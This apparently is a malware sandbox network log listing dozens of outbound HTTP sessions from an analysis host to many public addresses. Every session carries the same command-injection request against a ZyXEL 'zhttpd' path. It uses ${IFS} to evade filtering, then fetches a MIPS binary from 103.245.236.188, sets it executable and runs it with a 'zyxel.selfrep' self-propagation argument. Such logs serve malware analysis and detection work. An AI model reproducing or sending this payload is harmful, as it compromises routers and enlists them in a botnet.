                                                Jan 12, 2024 18:16:14.235456944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2314192.168.2.2348060141.50.177.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235497952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2315192.168.2.2354500117.241.249.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235516071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2316192.168.2.235133852.199.220.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235544920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2317192.168.2.2360342157.189.90.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235594034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2318192.168.2.2354478176.200.21.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235641956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2319192.168.2.233730048.20.13.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235681057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2320192.168.2.2336794153.115.206.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235712051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2321192.168.2.235739244.158.132.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235770941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2322192.168.2.234724861.45.74.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235799074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2323192.168.2.2340964174.7.73.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235856056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2324192.168.2.2339758116.42.249.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235882044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2325192.168.2.233627467.52.128.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235929012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2326192.168.2.2336686179.228.66.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235958099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2327192.168.2.2340304205.146.109.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236011028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2328192.168.2.23577721.67.218.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236030102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2329192.168.2.2338296116.89.70.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236085892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2330192.168.2.2357962109.216.137.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236114025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2331192.168.2.2340736216.69.91.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236179113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2332192.168.2.235774268.109.183.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236215115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2333192.168.2.2349906185.142.219.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236269951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2334192.168.2.2356412188.52.135.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236314058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2335192.168.2.2347938139.98.218.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236324072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2336192.168.2.235373280.238.239.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236351013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2337192.168.2.2334662135.36.78.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236414909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2338192.168.2.2346556100.63.254.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236444950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2339192.168.2.2356872140.222.88.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236473083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2340192.168.2.235133484.90.90.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236526966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2341192.168.2.2358406185.108.135.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.236563921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2342192.168.2.235559860.207.52.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.242786884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2343192.168.2.2339450161.99.27.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.242856026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2344192.168.2.2343780108.84.65.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.242907047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2345192.168.2.234246045.100.154.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.242964029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2346192.168.2.2345720122.148.246.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243010044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2347192.168.2.234494818.158.39.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243047953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2348192.168.2.2340600222.195.6.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243097067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2349192.168.2.2356318192.153.242.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243124962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2350192.168.2.2350724157.246.230.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243182898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2351192.168.2.2343392148.1.80.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243227959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2352192.168.2.2337208176.86.243.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243277073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2353192.168.2.2346864108.31.5.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243309021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2354192.168.2.2343088146.228.38.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243328094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2355192.168.2.2350388125.252.84.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243370056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2356192.168.2.2342504211.242.63.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243426085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2357192.168.2.233462888.219.78.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243463993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2358192.168.2.2334886179.70.23.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243493080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2359192.168.2.2342370155.84.143.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243535995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2360192.168.2.233569294.238.33.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243562937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2361192.168.2.23536125.111.206.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243606091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2362192.168.2.234969214.144.160.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243630886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2363192.168.2.2348172106.104.58.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243695974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2364192.168.2.234915697.157.47.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.243745089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2365192.168.2.2338500119.1.10.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.251910925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2366192.168.2.234285036.219.134.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.251976013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2367192.168.2.2360146131.243.201.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252010107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2368192.168.2.234593843.235.44.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252110958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2369192.168.2.233733014.94.173.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252152920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2370192.168.2.2345344175.123.211.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252204895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2371192.168.2.234162864.190.251.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252260923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2372192.168.2.234064249.119.50.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252307892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2373192.168.2.235916848.41.192.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252355099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2374192.168.2.234283052.95.13.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252393007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2375192.168.2.23594609.41.58.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252429962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2376192.168.2.235442667.181.118.232443
                                                TimestampBytes transferredDirectionData
